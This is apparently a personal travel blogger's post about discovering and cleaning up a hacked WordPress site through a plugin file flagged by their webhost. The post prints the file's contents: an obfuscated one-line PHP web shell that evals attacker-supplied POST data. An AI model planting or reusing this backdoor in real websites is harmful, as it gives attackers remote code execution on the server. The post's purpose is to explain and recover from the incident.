I might not update much anymore, but I still want the blog to remain as a record of my travels. This afternoon I got an email from 1and1, my webhost, telling me that the following file was “under attack” –

~/blog/wp-content/plugins/health-check/code.php

I was surprised, and immediately went into my SFTP client to download and check the file. It was an old plugin, I must have installed it as part of the PHP4 -> 5 changeover I did sometime while I was in Jordan to see what version was being reported. Tellingly, the plugin had never been updated, and I can’t seem to find it anymore in WordPress’s extension/plugin repository (although maybe this is it, as it’s named health-check in their database).

More chillingly, viewing the website in a browser yielded an error pertaining to my wp-includes folder, a settings file, that was no longer functioning. White screen; that’s it.

When I tried to download code.php to my computer to inspect it, Windows Defender immediately flagged the file as malware and deleted. Since I was on my work machine at the time, I had to talk to my colleague next door (who runs our antivirus scanner) to unblock the file! It was gobbledegook anyway – here’s what was inside it:

<?php                                                                                                                                                                                                                                                                      $scol4 =”t_psroue” ; $fcen0= $scol4[3]. $scol4[0].$scol4[4]. $scol4[0].$scol4[5].$scol4[6]. $scol4[2]. $scol4[2].$scol4[7]. $scol4[4]; $jphf86 =$fcen0 ( $scol4[1].$scol4[2].$scol4[5].$scol4[3]. $scol4[0] ) ; if ( isset( ${ $jphf86 }[‘qd6e706’ ]) ) { eval ( ${ $jphf86}[ ‘qd6e706’]); }?>

Anyway, using this thread here, the easy fix was just to entirely purge the wp-admin and wp-include folders and replace them with fresh downloads from wordpress.org. Once I did that, everything started working again. But it was quite a scare, especially since I cheaped out with 1and1 last year when they begged me to upgrade from my $4 a month hosting to something with backup capability. I run my own backups…sometimes. Heh. Guess I should do that now.

Update, June 6th – Found it. It’s almost positive that this was the cause of one of the infection, as today I was notified of flaws in the WP-Mobile-Detector plugin. I applied the patch right away, although weirdly enough it still shows the “last modified” date for the resize.php file as being February 2016, not June.